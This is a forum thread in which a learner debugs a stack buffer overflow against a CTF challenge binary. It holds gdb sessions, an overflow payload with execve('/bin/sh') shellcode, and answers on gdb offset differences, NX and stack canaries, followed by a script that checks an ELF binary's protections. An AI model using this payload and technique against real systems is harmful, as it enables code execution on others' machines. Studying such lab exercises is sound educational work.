
I'm trying to learn how buffer overflows work and how this can be used. I'm solving a simple challenge (backdoorlabs echo challenge) by trying to exploit a supplied binary file.

(see: http://hack.bckdr.in/ECHO/echo)

I think I'm doing everything right (according to the guides and tutorials I have been reading), but it still isn't working, and it has been driving me crazy for hours now.

The buffer overflow lets me overwrite the next instruction (eip).

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"')    

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

So I'm able to overwrite the next eip. Now let's add some 21-byte shellcode which spawns a shell and try to find the address where it is.

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $sp
0xbffff750:     0xe1f7c931      0x2f2f6851      0x2f686873      0x896e6962
0xbffff760:     0xcd0bb0e3      0xbfff0080      0xbffff80c      0xb7fff3d0
0xbffff770:     0x08048480      0xffffffff      0x0012efc4      0x080482d8
0xbffff780:     0x00000001      0xbffff7c0      0x0011eb25      0x0012fab0

Bingo, the shellcode is right here, loaded at 0xbffff750, so that is the address we want to point eip to.

Until now everything looks right to me, so I try it with the right values found.

(gdb) run <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0xbffff750 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.192.el6.i686
(gdb)


(gdb) x/i $eip
=> 0xbffff750:  xor    %ecx,%ecx
(gdb)

The eip got changed to the right address and the shellcode is in place; however, when I try it in my shell it does not work and still segfaults, as you can see.

[rick@TESTBOX tmp]$ ./vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀
Segmentation fault
[rick@TESTBOX tmp]$

Does anyone here have some thoughts about this, see an error, or have any other ideas? As mentioned, I'm a newbie trying to understand the basic principles, and obviously I'm doing something wrong.

I think the binary is probably compiled with stack protection? – skanilos yesterday
    
Is this something standard used by the gcc compiler? – skanilos yesterday
    
It's done by most modern operating systems, to prevent these types of exploits. You have to use special options to disable it. – Barmar yesterday
    
OK, I did this and the seg error disappeared, but still no shell is spawning. Any clues? – skanilos yesterday
This binary is NX enabled. You can't exploit it by using shellcode. You could check protection with this tool. – bananaappletw yesterday
Accepted answer:

I think your problem is:

there is a difference between the real execution of a program and the gdb-controlled one.

You need to either:

  1. predict this difference. And this question gives an example of how to do it.

OR

  2. I also faced your problem months ago. At that time, I observed this difference, but I did not use this way to find the difference; instead, I used the brute-force way shown in The Art of Exploitation 0x331: try different offsets with a shell script.

This question, which tells you how to turn off some security functions to allow you to attack, might help you in the future.

Thanks for your answer, it makes sense to me. Just an idea: if I changed the shellcode to echo to some file instead of spawning a shell, then when executed correctly in gdb it should have echoed to the file, correct? – skanilos 15 hours ago
    
I also want to mention that bananaappletw is also right because this binary has some protections (like stack execution protection which causes the segfault I believe). I used my own source and compiled it without any protections and indeed stumbled into the problem you are describing. – skanilos 15 hours ago
    
@skanilos I think it should work, but the shellcode to echo to a file may be much more complicated. Yes, the stack – 周耀阳 5 hours ago
    
Yes, the stack guard is enabled by default in gcc, so you need to disable it to attack. – 周耀阳 5 hours ago
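Two of the comments above, bananaappletw's remark that the binary is NX enabled and the note that gcc enables the stack guard by default, both come down to checking which mitigations a binary was built with before reasoning about why a stack-placed payload faults. The script below is an added example and is not code from the question, the answer, or any tool linked in the thread. It reads the ELF header and program headers the way checksec-style tools do: NX is derived from the PT_GNU_STACK segment flags, PIE from e_type, and the stack canary from a string-table heuristic (a binary built with -fstack-protector imports __stack_chk_fail). The ELF images it is tested against are constructed inline by the hypothetical `build_sample_elf32` helper; they are sample data, not real binaries.

```python
import struct
import sys

# ELF constants (from the ELF specification / <elf.h>)
PT_GNU_STACK = 0x6474E551   # program header that declares stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4
ET_EXEC, ET_DYN = 2, 3
ELFCLASS32, ELFCLASS64 = 1, 2


def elf_protections(data: bytes) -> dict:
    """Report NX, PIE and a stack-canary heuristic for an ELF image in memory.

    NX: a PT_GNU_STACK segment without PF_X means the loader maps the stack
    non-executable, so bytes placed there (as in the question) fault instead
    of running. A missing PT_GNU_STACK header historically meant an executable
    stack on x86, so it is reported as NX disabled.
    PIE: e_type == ET_DYN.
    Canary: heuristic; -fstack-protector binaries import __stack_chk_fail,
    so the name appears in the file's string tables.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class = data[4]
    if ei_class == ELFCLASS32:
        hdr = struct.unpack_from("<16sHHIIIIIHHHHHH", data, 0)
        ph_fmt, type_idx, flags_idx = "<IIIIIIII", 0, 6   # p_flags is 7th field
    elif ei_class == ELFCLASS64:
        hdr = struct.unpack_from("<16sHHIQQQIHHHHHH", data, 0)
        ph_fmt, type_idx, flags_idx = "<IIQQQQQQ", 0, 1   # p_flags follows p_type
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]

    gnu_stack_flags = None
    for i in range(e_phnum):
        ph = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        if ph[type_idx] == PT_GNU_STACK:
            gnu_stack_flags = ph[flags_idx]

    return {
        "class": 32 if ei_class == ELFCLASS32 else 64,
        "pie": e_type == ET_DYN,
        "gnu_stack_present": gnu_stack_flags is not None,
        "nx": gnu_stack_flags is not None and not (gnu_stack_flags & PF_X),
        "canary": b"__stack_chk_fail" in data,
    }


def build_sample_elf32(stack_flags: int, e_type: int = ET_EXEC,
                       with_canary_symbol: bool = False) -> bytes:
    """Construct a minimal, non-runnable ELF32 i386 image for testing.

    Constructed sample data, not a real binary: one PT_LOAD header, one
    PT_GNU_STACK header with the requested flags, and optionally a fake
    string-table blob carrying the __stack_chk_fail name.
    """
    ident = b"\x7fELF" + bytes([ELFCLASS32, 1, 1, 0]) + b"\x00" * 8
    phoff, phentsize, phnum = 52, 32, 2
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, e_type, 3, 1, 0x08048000,
                       phoff, 0, 0, 52, phentsize, phnum, 0, 0, 0)
    load = struct.pack("<IIIIIIII", 1, 0, 0x08048000, 0x08048000,
                       0x100, 0x100, PF_R | PF_X, 0x1000)
    stack = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0,
                        stack_flags, 16)
    tail = b"\x00libc.so.6\x00__stack_chk_fail\x00" if with_canary_symbol else b""
    return ehdr + load + stack + tail


if __name__ == "__main__":
    # Usage: python elfcheck.py /path/to/binary
    with open(sys.argv[1], "rb") as f:
        for key, value in elf_protections(f.read()).items():
            print("%-18s %s" % (key, value))
```

Run against the challenge binary, an `nx: True` line explains the segfault at 0xbffff750 outside gdb without any further experimentation: the stack page simply is not mapped executable. The canary check is deliberately a heuristic; a full check would walk the dynamic symbol table, and `readelf -l` / `readelf -s` show the same information by hand.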
